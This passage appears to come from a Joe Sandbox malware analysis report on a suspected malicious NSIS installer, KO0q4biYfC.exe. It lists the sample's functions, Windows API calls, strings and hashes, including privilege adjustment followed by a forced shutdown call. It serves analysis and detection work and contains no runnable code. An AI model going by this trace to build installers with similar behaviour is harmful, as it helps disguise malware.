Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: f9a2de03cf9915eb0235c2969b652264121baf640a1041f56a4f1ddc353ac002
Instruction ID: 408a70195e3ca8c372c5c0c48a857e11b1dc989659d179bb1527d64f2e5a7a5d
Opcode Fuzzy Hash: f9a2de03cf9915eb0235c2969b652264121baf640a1041f56a4f1ddc353ac002
Instruction Fuzzy Hash: D94180B1008749DFD315EF22D8C4B6677F8EB88311F11492EE54BCB581EB70A845CB62

Function 73C6161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73C621EC,?,00000808), ref: 73C61635
GlobalAlloc.KERNEL32(?,00000000,?,00000000,73C621EC,?,00000808), ref: 73C6163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73C621EC,?,00000808), ref: 73C61650
GetProcAddress.KERNEL32(73C621EC,00000000), ref: 73C61657
GlobalFree.KERNEL32(00000000), ref: 73C61660

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: e76777e92eef7ca970210587b02eaaaee692ac5a1bf0757b570d60a2249ba3c1
Instruction ID: 52a174d7f76748860d6485f8394f7df0304d6a1545d5ee911e3820842c327114
Opcode Fuzzy Hash: e76777e92eef7ca970210587b02eaaaee692ac5a1bf0757b570d60a2249ba3c1
Instruction Fuzzy Hash: A4F01C7320A578BBD62066E78C4CD9BBE9CDF8B2F6B210211F62C96190C6618C01D7F1

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00405CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403492,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 00405CC3
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403492,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 00405CCD
lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405CDF

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CBD

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00403A43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,00403A1A,771B3420,00403819,00000006,?,00000006,?,0000000A), ref: 00403A5D
GlobalFree.KERNEL32(?), ref: 00403A64

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403A55

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98

Function 00405D09 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KO0q4biYfC.exe,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405D0F
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KO0q4biYfC.exe,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405D1F

Strings

C:\Users\user\Desktop, xrefs: 00405D09

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC

Function 73C610E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?), ref: 73C6116A
GlobalFree.KERNEL32(00000000), ref: 73C611C7
GlobalFree.KERNEL32(00000000), ref: 73C611D9
GlobalFree.KERNEL32(?), ref: 73C61203

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 52a0786c95fe2aefd0dba167c84acd1cbf890f4bece9d19b0d0066aca95283c1
Instruction ID: b4e5a1c3748149d8907a9bd62634eef7901b60e3e4efb049dc45edc8a7f5522e
Opcode Fuzzy Hash: 52a0786c95fe2aefd0dba167c84acd1cbf890f4bece9d19b0d0066aca95283c1
Instruction Fuzzy Hash: 413181F2904211DFE700EF67C985B257BF8EB45212B250519E94ADF294E736DD0187A0

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Analysis Process: KO0q4biYfC.exePID: 6596, Parent PID: 7000COMMON

Non-executed Functions

Function 004034A5 Relevance: 75.7, APIs: 32, Strings: 11, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,?,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,?,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,?,0000000A), ref: 00403576
CharNextW.USER32(00000000,00435000,?,00435000,00000000,?,00000006,?,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(?,00437800,?,00000006,?,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,?,0000000A), ref: 004036F9
lstrcatW.KERNEL32(00437800,\Temp,?,00000006,?,0000000A), ref: 00403705
GetTempPathW.KERNEL32(?,00437800,00437800,\Temp,?,00000006,?,0000000A), ref: 00403719
lstrcatW.KERNEL32(00437800,Low,?,00000006,?,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,?,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,?,0000000A), ref: 0040373A
DeleteFileW.KERNEL32(00437000,?,00000006,?,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040384D
lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040385C
lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,?,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?,?,00000006,?,0000000A), ref: 004038E9
CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,?,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,?,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

SeShutdownPrivilege, xrefs: 0040396F
TEMP, xrefs: 0040372D
NSIS Error, xrefs: 00403567
~nsu, xrefs: 00403845
Error launching installer, xrefs: 004037D0
\Temp, xrefs: 004036FF
.tmp, xrefs: 00403861
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
TMP, xrefs: 00403735
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
Low, xrefs: 0040371B

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-334447862
Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,?), ref: 00404DEF
GlobalAlloc.KERNEL32(?,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,?,004053C4), ref: 00404E65
